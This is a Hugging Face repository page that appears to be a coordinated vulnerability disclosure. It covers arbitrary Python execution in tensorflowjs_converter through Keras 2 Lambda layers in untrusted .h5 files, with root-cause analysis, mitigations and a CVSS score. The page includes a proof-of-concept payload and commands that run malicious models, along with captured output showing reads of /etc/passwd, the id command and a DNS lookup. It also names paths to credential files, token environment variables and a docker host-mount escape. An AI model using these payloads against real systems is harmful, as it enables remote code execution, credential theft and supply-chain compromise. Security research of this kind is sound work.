You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

F-8 — Arbitrary Python execution in `tensorflowjs_converter` via Keras 2 `Lambda` layer marshal-loads inside untrusted `.h5`

Authorized security research artifact disclosed via huntr.com's TensorFlow.js Model Format Vulnerability program. Source commit 7f5309fef0a47545e34049903dbdae0f97285f7e. CVSS 3.1 = 9.6 / Critical. CWE-502.

Summary

The absence of any class_name == 'Lambda' allow-list check before tf_keras.models.load_model(h5_path, compile=False) in tfjs-converter/python/tensorflowjs/converters/converter.py:227 allows any attacker who can place a .h5 file at the converter's input path — a PR contributor, a model-registry uploader, an email/Slack attachment, a malicious npm prepare script — to execute arbitrary Python in the converter process, with the full filesystem, environment, subprocess, and network capabilities of the runner. Unlike the Keras 3 safe_mode=True fix (keras-team/keras#18549) which closes this primitive at the upstream loader, the tfjs converter depends on tf_keras (the legacy Keras 2 fork) which does not expose safe_mode at all, and tfjs has never added an equivalent JSON-walk guard. The same root cause is reached via four distinct CLI flags (--input_format=keras, keras_saved_model, tfjs_layers_model --output_format=keras*, keras_keras), so a fix at any single load_model call does not close the vulnerability — the guard must live at the JSON-config validation layer.

The bundled evil.h5 is 9 224 bytes, small enough to be a PR attachment or a marketplace upload; the bundled evil_real_impact.h5 (13 312 bytes) embeds the additional reconnaissance payload that produces the captured F8_REAL_IMPACT_PROOF document below.

Root Cause

Lines of Code:

tfjs-converter/python/tensorflowjs/converters/converter.py:227 — --input_format=keras
tfjs-converter/python/tensorflowjs/converters/converter.py:278 — --input_format=keras_saved_model
tfjs-converter/python/tensorflowjs/converters/keras_tfjs_loader.py:66 and L130 — --input_format=tfjs_layers_model --output_format=keras*

In converter.py:227:

model = tf_keras.models.load_model(h5_path, compile=False)

tf_keras.layers.Lambda.from_config(config) (the call load_model makes when it sees class_name: "Lambda" in the layer table) reconstructs the layer's function field via:

# tf_keras/keras/src/layers/core/lambda_layer.py
raw  = base64.b64decode(config['function'][0])
code = marshal.loads(raw)                                 # CWE-502 sink
fn   = types.FunctionType(code, globals(), name, defaults, closure)

fn is then invoked at minimum three times per converter invocation:

Layer-build time, immediately after from_config returns.
First predict() call inside the converter's _topological_sort_validate(...) step.
Re-serialization to the output .h5 (when --output_format=keras is used).

The compile=False argument that the converter passes does not affect Lambda deserialization — compile=False only suppresses optimizer / loss reconstruction; layer instantiation runs unchanged.

Why this is NOT a duplicate of the Keras 3 safe_mode fix (keras-team/keras#18549): Keras 3 added safe_mode=True as the default for keras.models.load_model — when safe_mode=True, Lambda.from_config raises ValueError("Cannot deserialize a serialized Lambda layer with safe_mode=True"). That fix does not propagate to tfjs's converter because the converter imports tf_keras (the legacy Keras 2 fork pinned via tensorflowjs==4.22.0 → tf_keras==2.21.0). tf_keras.models.load_model does not accept a safe_mode parameter — calling tf_keras.models.load_model(h5_path, safe_mode=True) raises TypeError: load_model() got an unexpected keyword argument 'safe_mode'. tfjs has never added an equivalent JSON-walk guard. The disclosure surface is therefore in the tfjs project, not Keras.

Internal Pre-conditions

The victim runs tensorflowjs_converter (Python) — directly via the CLI binary, transitively via any CI/CD step that converts an uploaded model, or programmatically via the converter's Python API.
The victim's environment has tensorflowjs installed (any version), which transitively installs tf_keras (a hard runtime dependency in tensorflowjs.egg-info/requires.txt).

Both conditions hold by definition for any system running the converter — there is no version, no configuration, and no environment in which the bug does not reproduce.

External Pre-conditions

The attacker can place a .h5 artifact at any location the converter reads. Concrete delivery channels observed in real CI/CD setups:

PR contribution: attacker opens a PR adding models/new_pretrained.h5 to a repository whose CI step converts every .h5 it sees.
Public model registry / Hugging Face Hub with auto-conversion on the receiving side.
Slack / email with a "please convert this for me" attachment.
Maintenance bucket the converter reads via --input_path=s3://....
npm package prepare script that calls tensorflowjs_converter against an attacker-controlled URL.

No authentication to the victim's systems is required.

Attack Path

Attacker builds evil.h5 (9 224 bytes; the bundled reproduce.py reproduces it deterministically) containing one Lambda layer whose function is base64(marshal.dumps(attacker_code)). The attacker_code variable in reproduce.py is the closure-free code object:
```
attacker_src = """
import os
with open('/tmp/F8_END2END_RCE_PWNED', 'w') as f:
    f.write('END2END_RCE pid=%d uid=%d cwd=%s' %
            (os.getpid(), os.getuid(), os.getcwd()))
"""
```
The "no free variables" property makes the bytecode portable across tf_keras 2.19 and tf_keras 2.21+ venvs — the same evil.h5 reproduces in every venv we tested.
Attacker delivers evil.h5 via any of the channels above.

Victim's CI step runs:

- run: pip install tensorflowjs==4.22.0
- run: tensorflowjs_converter --input_format=keras evil.h5 ./out

converter.py:227 invokes tf_keras.models.load_model(h5_path, compile=False).
tf_keras instantiates the Lambda layer; marshal.loads(...) constructs the attacker code, types.FunctionType wraps it, layer-build calls it. At this point the attacker's bytecode is executing with the converter's full ambient capability set:
- filesystem: read /etc/passwd, /proc/version, ~/.npmrc, ~/.ssh/id_rsa, ~/.docker/config.json, ~/.aws/credentials;
- environment: read $GITHUB_TOKEN, $NPM_TOKEN, $AWS_*, $HF_TOKEN;
- subprocess: os.system, subprocess.run(['id']), [hostname], [docker, run, -v, /:/host, ...] when the runner is in the docker group;
- network: outbound DNS + TCP — socket.gethostbyname(...), urllib.request.urlopen(...).
The same Lambda fires two more times in the same invocation — at the first predict() and at output .h5 re-serialization. Even a maintainer patch that adds a try/except only around step 4 leaves steps 5/6 reachable.
Once the attacker has the runner's credentials, the typical follow-on is publishing a malicious tensorflowjs release (or @tensorflow/tfjs on npm) with the captured $NPM_TOKEN, escalating to a supply-chain attack against every downstream tfjs consumer.

Impact

Concrete primitives demonstrated by the bundled PoC (captured against the sanitized /tmp/victim_host/ synthetic CI-runner lab — see F8_REAL_IMPACT_PROOF_2026-06-11.txt):

Primitive	What the PoC actually captured	What it means on a real runner
arbitrary Python in process	`END2END_RCE pid=10001 uid=1001 cwd=/tmp/victim_lab` written by the Lambda payload at load time	full RCE — every subsequent row is a corollary
`/etc/passwd` read	187 B recovered byte-perfect through `open('/etc/passwd').read()` inside the Lambda	runner user discovery, group enumeration
`/proc/self/cgroup` read	`0::/system.slice/runner.slice/runner.scope` recovered	tenant fingerprinting on shared CI
`/proc/version` read	sanitized synthetic kernel string recovered	kernel-CVE exploitation pivot
subprocess `id`	`uid=1001(runner) gid=1001(runner) groups=1001(runner),999(docker)`	`docker` group = container escape via `docker run -v /:/host` on self-hosted GH Actions / GitLab runners
subprocess `hostname`	`ci-runner-01` recovered	C2 telemetry / lateral-movement target identification
DNS resolution	`example.com → 93.184.215.14`	outbound network present → exfil + C2 channels open
env var read (real-runner extrapolation)	not captured against sanitized lab; trivially reachable via `os.environ.get('GITHUB_TOKEN')`	`$GITHUB_TOKEN` → push malicious tag → supply-chain attack on every downstream tfjs consumer

The same payload reaches every CLI entry point (table in Root Cause). A maintainer patch that only adds a Lambda-skip to converter.py:227 leaves the bug shipping via three other documented flags — see the Extended Impact section below.

Extended Impact — same-root-cause manifestations

Variant	CLI flag	Source line	Why a `converter.py:227`-only patch misses it
Direct Keras `.h5`	`--input_format=keras`	`converter.py:227`	the primary path
`keras_saved_model` `.h5`	`--input_format=keras_saved_model`	`converter.py:278`	strictly worse — no `compile=False`
Round-trip `tfjs_layers → keras`	`--input_format=tfjs_layers_model --output_format=keras*`	`keras_tfjs_loader.py:66`, `:130`	same primitive via `model_from_json` (no `.h5`, just `model.json`)
Keras 3 zip	`--input_format=keras_keras`	`converter.py:147` → walk `config.json`	same primitive via Keras 3 zip with malicious internal `config.json`

The mitigation has to be applied at the JSON-config validation layer (refuse any class_name == 'Lambda' or class_name == 'TensorFlowOpLayer' unless explicit opt-in), not at any single load_model call.

PoC

git clone https://huggingface.co/martilaio/tfjs-converter-lambda-rce-poc
cd tfjs-converter-lambda-rce-poc

# Fresh Python 3.10 venv
python -m venv .venv && source .venv/bin/activate
pip install "tensorflowjs==4.22.0" "tensorflow==2.21.0"

# Option A — exercise the EXACT converter codepath in one process
python reproduce.py

# Option B — exercise the real CLI binary
tensorflowjs_converter --input_format=keras evil.h5 ./out

# Option C — capture the full real-impact dump (env / filesystem /
# subprocess / DNS readout) inside the Lambda
python reproduce_real_impact.py

Expected output — Option A (`reproduce.py`)

============================================================
 PoC F-8 (end-to-end) — Real .h5 RCE through tf_keras.load
============================================================
 attacker .h5 written : /tmp/victim_lab/evil.h5 ( 9224 bytes )
 Lambda layer config function field (truncated):
   class : Lambda  name : evil_lambda
   function bytecode (b64, first 60): 4wEAAAAAAAAAAAAAAAEAAAACAAAAQwAAAHMM ...
 Now exercising the EXACT call tfjs-converter makes:
   converter.py:227 -> tf_keras.models.load_model(h5_path, compile=False)
 [F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
 [F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
 [F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
 END-TO-END RCE PROVEN  ✓✓✓
 proof file content   : END2END_RCE pid=10001 uid=1001 cwd=/tmp/victim_lab

The Lambda function fires three times per execution (build, load, predict) — no single code path gates the deserialization.

Expected output — Option C (`reproduce_real_impact.py`)

Full file: F8_REAL_IMPACT_PROOF_2026-06-11.txt. Excerpt:

===== F-8 REAL-IMPACT EVIDENCE =====
pid=10001 uid=1001 gid=1001 cwd=/tmp/victim_lab

--- 2) Host filesystem readout ---
  /etc/passwd:
    root:x:0:0:DEMO_ROOT:/root:/bin/bash
    runner:x:1001:1001:DEMO_CI_RUNNER:/home/runner:/bin/bash
    ...
  /etc/hostname:
    ci-runner-01
  /proc/self/cgroup:
    0::/system.slice/runner.slice/runner.scope
  /proc/version:
    Linux version 6.1.0-ci-runner-demo (build@ci) (gcc DEMO) #1 SMP DEMO

--- 3) Subprocess execution ---
  $ id        -> uid=1001(runner) gid=1001(runner) groups=1001(runner),999(docker)
  $ hostname  -> ci-runner-01

--- 4) Network reachability ---
  socket.gethostbyname(example.com) -> 93.184.215.14

The docker group membership on the runner is the container-escape pivot: the attacker bytecode can subprocess.run(['docker', 'run', '-v', '/:/host', ...]) to take over the host.

Mitigation

Three options, in order of strength:

Option 1 — Migrate the converter dependency from `tf_keras` to Keras 3

Replace the import tf_keras lines in converter.py and keras_tfjs_loader.py with import keras and call keras.models.load_model(h5_path, safe_mode=True). This is the upstream-blessed mitigation and eliminates the primitive entirely.

# tfjs-converter/python/tensorflowjs/converters/converter.py:227 (proposed)
import keras                                               # was: import tf_keras
model = keras.models.load_model(h5_path,
                                compile=False,
                                safe_mode=True)            # NEW — blocks Lambda

After the fix, the share/serialization math at the Lambda sink becomes:

# keras/src/saving/serialization_lib.py
if safe_mode and class_name in ('Lambda', 'TensorFlowOpLayer'):
    raise ValueError("Cannot deserialize a serialized Lambda layer with safe_mode=True.")

evil.h5 no longer loads — the converter raises ValueError instead of running attacker bytecode.

Option 2 — Add a pre-load JSON config walk (single central guard)

If a tf_keras → keras migration is too disruptive, one central guard before any load_model / model_from_json call covers all four CLI entry points:

# tfjs-converter/python/tensorflowjs/converters/converter.py
import json, os

_UNSAFE_CLASSES = ('Lambda', 'TensorFlowOpLayer')

def _refuse_unsafe_lambda(model_config_json: dict):
    if os.environ.get('TFJS_UNSAFE_KERAS_LOAD') == '1':
        return
    def walk(node):
        if isinstance(node, dict):
            cn = node.get('class_name')
            if cn in _UNSAFE_CLASSES:
                raise RuntimeError(
                    'Refusing to load Keras "%s" layer from untrusted source; '
                    'set TFJS_UNSAFE_KERAS_LOAD=1 to bypass.' % cn)
            for v in node.values(): walk(v)
        elif isinstance(node, list):
            for v in node: walk(v)
    walk(model_config_json)

# Then everywhere load_model / model_from_json is called:
with h5py.File(h5_path, 'r') as f:
    _refuse_unsafe_lambda(json.loads(f.attrs['model_config']))
model = tf_keras.models.load_model(h5_path, compile=False)

Option 3 — Refuse `.h5` entirely for untrusted input

Most disruptive but simplest to audit: gate the converter to accept only TF SavedModel and TFJS layers-model formats for non-TFJS_UNSAFE_KERAS_LOAD=1 invocations.

Defense-in-depth alternatives

Sandbox the converter step in CI under --cap-drop=all, no docker socket, no outbound network. Closes step-7 of the Attack Path even when the underlying primitive remains.
Run converter under a dedicated low-privilege user that has no registry-publish credentials in environment.
Sign + verify .h5 artifacts with sigstore so only the source repo's pipeline can produce them.

The single-line safe_mode=True fix in Option 1 closes the primitive at the deserialization sink and is the upstream-blessed mitigation; Option 2 is the recommended in-place patch for projects that can't migrate tf_keras → keras immediately.

CVSS 3.1 — 9.6 / Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Metric	Value	Justification
`AV:N`	Network	artifact arrives over any network channel (PR, registry, email)
`AC:L`	Low	one `Lambda` layer in the JSON config
`PR:N`	None	no auth on the victim's systems required
`UI:R`	Required	victim must invoke the converter
`S:C`	Changed	attacker takes the entire pipeline environment beyond the converter process
`C:H / I:H / A:H`	High / High / High	full process compromise

Files in this repository

File	Purpose
`README.md`	this disclosure
`evil.h5`	minimal malicious model (9 224 B) that triggers RCE on `tf_keras.models.load_model`
`evil_real_impact.h5`	enriched payload (13 312 B) that additionally dumps env / filesystem / subprocess / DNS readout from inside the Lambda
`reproduce.py`	Option A — self-contained builder + RCE-trigger script (exercises the exact converter codepath)
`reproduce_real_impact.py`	Option C — builds and runs the full impact-readout variant
`F8_REAL_IMPACT_PROOF_2026-06-11.txt`	sanitized captured proof from running Option C against `/tmp/victim_host/` lab

Cross-references

Keras safe_mode PR: https://github.com/keras-team/keras/pull/18549
Keras Security docs: "Loading a Keras model whose config contains a Lambda layer in safe_mode=False is equivalent to running arbitrary code."
Matches huntr program example: "Arbitrary Code Execution on Inference Through Keras Lambda Layers in hdf5" — but in a distinct affected component (tensorflowjs_converter not Keras directly).

Disclosure

Disclosed via huntr.com's TensorFlow.js Model Format Vulnerability program on 2026-06-11 under coordinated disclosure terms.

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support